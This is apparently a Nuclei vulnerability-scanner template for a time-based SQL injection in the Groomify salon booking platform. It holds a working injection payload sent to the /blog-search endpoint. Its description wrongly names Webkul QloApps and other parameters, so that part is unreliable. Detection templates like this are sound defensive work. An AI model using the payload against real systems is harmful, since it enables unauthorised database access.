id: groomify-sqli

info:
  name: Groomify v1.0 - SQL Injection Vulnerability
  author: theamanrawat
  severity: high
  description: |
    An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.
  reference:
    - https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#
    - https://vulners.com/zdt/1337DAY-ID-38799
  metadata:
    verified: "true"
    max-request: 1
  tags: sqli,groomify,unauth

http:
  - raw:
      - |
        @timeout: 25s
        GET /blog-search?search=deneme%27%20AND%20(SELECT%201642%20FROM%20(SELECT(SLEEP(6)))Xppf)%20AND%20%27rszk%27=%27rszk HTTP/2
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 200
          - contains(header, "text/html")
          - contains(body, 'value=\"deneme')
        condition: and

# digest: 4b0a00483046022100fda9980ba40b20fb868d13705d7db4a186fc38bee4f6b9830a2be5fc925a49c2022100e4e368ed18b2edf18a26b2f062058ef20c8627510f6e800b2904103ce46e744b:922c64590222798bb761d5b6d8e72950